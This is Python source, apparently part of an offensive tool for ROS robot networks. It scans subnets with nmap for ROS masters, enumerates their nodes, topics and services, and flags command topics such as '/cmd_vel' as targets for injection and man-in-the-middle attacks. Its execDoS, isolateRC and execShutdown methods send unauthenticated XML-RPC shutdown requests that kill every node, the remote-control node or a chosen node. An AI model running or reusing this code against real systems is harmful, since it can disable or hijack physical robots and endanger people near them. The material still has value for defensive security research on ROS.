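def topicAnalyser(self, host, port, attack):
    """Classify the topics a ROS master advertises for the given test mode.

    Calls ``getTopicTypes()`` through the project's XML-RPC wrapper and
    inspects the returned entries, which are indexed as
    ``(topic name, message type)``.

    Args:
        host: Address of the ROS master to query.
        port: XML-RPC port of the ROS master.
        attack: Mode selector; ``'ACI'`` and ``'MITM'`` are recognised.

    Returns:
        For ``'ACI'``: the list of topic entries whose name is on the
        hard-coded watch list (empty when none match). Matches are also
        printed as a numbered menu.
        For ``'MITM'``: ``True`` when ``/cmd_vel`` is advertised, otherwise
        ``False``.
        For any other mode: ``None``.
    """
    # Name-based heuristic only: a topic is flagged because of its name,
    # not because anything about its publishers or subscribers was verified.
    vulnerable_topics = ['/sound', '/cmd_vel', '/motor_power']

    rpc = api.XMLRPC_API(host, port)
    topics = rpc.getTopicTypes()

    if attack == 'ACI':
        # A real comprehension instead of one evaluated only for its
        # append() side effect.
        exploitable_topics = [
            topic for topic in topics if topic[0] in vulnerable_topics
        ]
        if exploitable_topics:
            os.system('clear')
            cprint("\r[+] Topics on target that are vulnerable for ACI attack:",
                   'green', attrs=['bold'])
            for counter, topic in enumerate(exploitable_topics, start=1):
                print(" [" + str(counter) + "] '{}' with message type '{}'"
                      .format(topic[0], topic[1]))
        # Always hand back a list so callers can test or index the result
        # without a None check.
        return exploitable_topics

    if attack == 'MITM':
        return any(topic[0] == '/cmd_vel' for topic in topics)

    return None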
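def execShutdown(self, host, port, nodes):
    """Prompt for one node from a numbered list and send it a shutdown request.

    The request goes through the project's XML-RPC wrapper. Only ``host``
    and ``port`` are passed to it; no credentials are involved in this call.

    Args:
        host: Address handed to the XML-RPC wrapper.
        port: Port handed to the XML-RPC wrapper.
        nodes: Node entries in the order they were listed to the operator.
            Index 0 of an entry is shown as its name; index 1 is passed to
            ``shutdown``.

    Returns:
        None. Returns immediately, without prompting, when ``nodes`` is
        empty.
    """
    if not nodes:
        # Nothing can be selected, so the prompt below could never be
        # satisfied.
        return

    while True:
        # Only the integer conversion is guarded, so an error raised by the
        # RPC call is not misreported as bad operator input.
        try:
            option = int(input("\nSelect node to shutdown: "))
        except ValueError:
            sys.stdout.write(colored("\r[!] Invalid input", 'red'))
            time.sleep(1.5)
            continue

        # The menu is 1-based. Accepting 0 would resolve to nodes[-1]
        # through negative indexing and act on a node the operator never
        # selected.
        if not 1 <= option <= len(nodes):
            sys.stdout.write(colored("\r[!] Invalid input", 'red'))
            time.sleep(1.5)
            continue

        selected = nodes[option - 1]
        rpc = api.XMLRPC_API(host, port)
        rpc.shutdown(selected[1])
        os.system('clear')
        print(
            colored(
                "[+] Successfully send shutdown command to node: {}"
                .format(selected[0]),
                'green',
                attrs=['bold']))
        break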
def systemRecon(self):
    """Print a per-node summary of ``getSystemState()`` for every master.

    For each ``(host, port)`` pair in ``self.master_hosts`` the publisher,
    subscriber and service tables are fetched. Every node collected so far
    is then printed with the topics it publishes, the topics it subscribes
    to and the services it is listed under.

    Returns:
        None. Output goes to stdout only.
    """
    # NOTE(review): this list is created once, outside the host loop, so
    # nodes collected from an earlier master are listed again under every
    # later master. Confirm that is intended.
    active_nodes = []

    for host, port in self.master_hosts:
        rpc = api.XMLRPC_API(host, port)
        publisher, subscriber, service = rpc.getSystemState()

        # Only the first node of each table entry is collected, publishers
        # before subscribers, keeping first-seen order without duplicates.
        for table in (publisher, subscriber):
            for entry in table:
                if entry[1][0] not in active_nodes:
                    active_nodes.append(entry[1][0])

        cprint("[+] Enumeration of ROS environment " + host +
               " successfully completed:\n", 'green', attrs=['bold'])

        for teller, node in enumerate(active_nodes, start=1):
            print(colored(" [" + str(teller) + "] Node: " + node,
                          'cyan', attrs=['bold']))

            print(colored(" Publishing to:", 'white', attrs=['bold']))
            for pub in publisher:
                if node in pub[1]:
                    print(" " + pub[0])

            print(colored("\n Subscribed to:", 'white', attrs=['bold']))
            for sub in subscriber:
                if node in sub[1]:
                    print(" " + sub[0])

            print(colored("\n Services:", 'white', attrs=['bold']))
            for srv in service:
                if node in srv[1]:
                    print(" " + srv[0])

            print()
def execDoS(self, host, port):
    """Send a shutdown request to every node returned by ``filterNodes()``.

    Args:
        host: Address handed to the XML-RPC wrapper.
        port: Port handed to the XML-RPC wrapper.

    Returns:
        None. Nothing is sent when the node list is empty.
    """
    rpc = api.XMLRPC_API(host, port)
    nodes = rpc.filterNodes()
    if len(nodes) == 0:
        return

    # Index 1 of each entry is the value handed to shutdown(). No
    # credentials are passed anywhere in this call chain.
    for entry in nodes:
        rpc.shutdown(entry[1])
def isolateRC(self, host, port, rc_node):
    """Send a shutdown request only to nodes matching the remote-control node.

    Args:
        host: Address handed to the XML-RPC wrapper.
        port: Port handed to the XML-RPC wrapper.
        rc_node: Entry describing the remote-control node; only index 0 is
            compared.

    Returns:
        None. Nothing is sent when no entry matches or the list is empty.
    """
    rpc = api.XMLRPC_API(host, port)
    nodes = rpc.filterNodes()
    if len(nodes) == 0:
        return

    for candidate in nodes:
        # Entries are matched on index 0 alone; index 1 of the matching
        # entry is what shutdown() receives.
        if candidate[0] != rc_node[0]:
            continue
        rpc.shutdown(candidate[1])
def defaultMasterFinder(self):
    """Record hosts that answer as a ROS master on port 11311.

    Hosts reported by the network scan, minus the gateway address, are
    probed with ``masterCheck()``. Each positive result is appended to
    ``self.found_master_hosts`` as ``[host, 11311]``.

    Returns:
        None.
    """
    default_port = 11311  # conventional ROS master port

    scanner = network.NetworkScanner(self.ipscan.ipConstructor(), default_port)

    # Drop the gateway so the router itself is never probed.
    candidates = []
    for found in scanner.nmapScan():
        if found != self.ipscan.ipGateway():
            candidates.append(found)

    for host in candidates:
        probe = api.XMLRPC_API(host, default_port)
        # The equality comparison with True is kept exactly as written.
        if probe.masterCheck() == True:
            self.found_master_hosts.append([host, default_port])
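def nodesAnalyser(self, host, port):
    """List the nodes reported by ``filterNodes()`` as a numbered menu.

    Each entry is printed with index 0 as the node name, index 1 as its URI
    and index 2 as its PID.

    Args:
        host: Address handed to the XML-RPC wrapper.
        port: Port handed to the XML-RPC wrapper.

    Returns:
        The node entries in menu order. An empty result is returned as-is
        and nothing is printed, so callers can test the return value
        directly.
    """
    rpc = api.XMLRPC_API(host, port)
    nodes = rpc.filterNodes()

    if nodes:
        os.system('clear')
        cprint("\r[+] Running node(s) on target:", 'green', attrs=['bold'])
        # enumerate() keeps the printed number and list position in step;
        # the menu is 1-based.
        for counter, node in enumerate(nodes, start=1):
            print(" [" + str(counter) + "] Node: {} \n URI: {} \n PID: {}"
                  .format(node[0], node[1], node[2]))

    # Returned on every path so the result never depends on whether
    # anything was printed.
    return nodes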
def topicRecon(self):
    """Print the topics and message types advertised by every known master.

    For each ``(host, port)`` pair in ``self.master_hosts`` the result of
    ``getTopicTypes()`` is printed as a numbered list. Topics whose name is
    on the hard-coded watch list are highlighted.

    Returns:
        None. Output goes to stdout only.
    """
    # The label below comes from a name match alone; nothing about the
    # topic is verified before it is tagged.
    vulnerable_topics = ['/sound', '/cmd_vel', '/motor_power']

    for host, port in self.master_hosts:
        topics = api.XMLRPC_API(host, port).getTopicTypes()

        if len(topics) == 0:
            cprint("\n[-] No active topics are found on the target system: {}".format(host),
                   'red', attrs=['bold'])
            continue

        cprint("\n[+] Identified topics and message types on target: {}".format(host),
               'green', attrs=['bold'])

        for counter, topic in enumerate(topics, start=1):
            name, msg_type = topic[0], topic[1]
            prefix = " [" + str(counter) + "] "
            if name in vulnerable_topics:
                cprint(prefix + "[VULNERABLE] '{}' with message type '{}'".format(name, msg_type),
                       'red')
            else:
                print(prefix + "'{}' with message type '{}'".format(name, msg_type))
def definedMasterFinder(self):
    """Look for ROS masters on the configured non-default port range.

    Ports are walked from ``port_range_start + port_range_counter`` up to,
    but not including, ``port_range_end``. Port 11311 is skipped. Hosts
    that pass ``masterCheck()`` are appended to both
    ``self.found_master_hosts`` and ``self.temp_masters_bin`` as
    ``[host, port]``.

    Returns:
        None. Results are left on the instance attributes.
    """
    for port in range((self.port_range_start + self.port_range_counter), self.port_range_end):
        # The counter advances before any work on this port, so the next
        # call starts after it even when this call returns early.
        self.port_range_counter += 1
        # 11311 is the only port excluded from this scan.
        if port == 11311:
            continue
        # Cleared for every port scanned, so it holds only the masters
        # found on the most recent one.
        self.temp_masters_bin = []
        active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(), port).nmapScan()
        # The gateway address is excluded from probing.
        active_hosts = [ h for h in active_hosts if h != self.ipscan.ipGateway() ]
        if len(active_hosts) > 0:
            for host in active_hosts:
                rpc = api.XMLRPC_API(host, port)
                if rpc.masterCheck() == True:
                    self.found_master_hosts.append([host, port])
                    self.temp_masters_bin.append([host, port])
            # NOTE(review): placed so the scan stops at the first port where
            # any host answered, leaving the rest of the range for a later
            # call -- confirm this nesting against the original file.
            return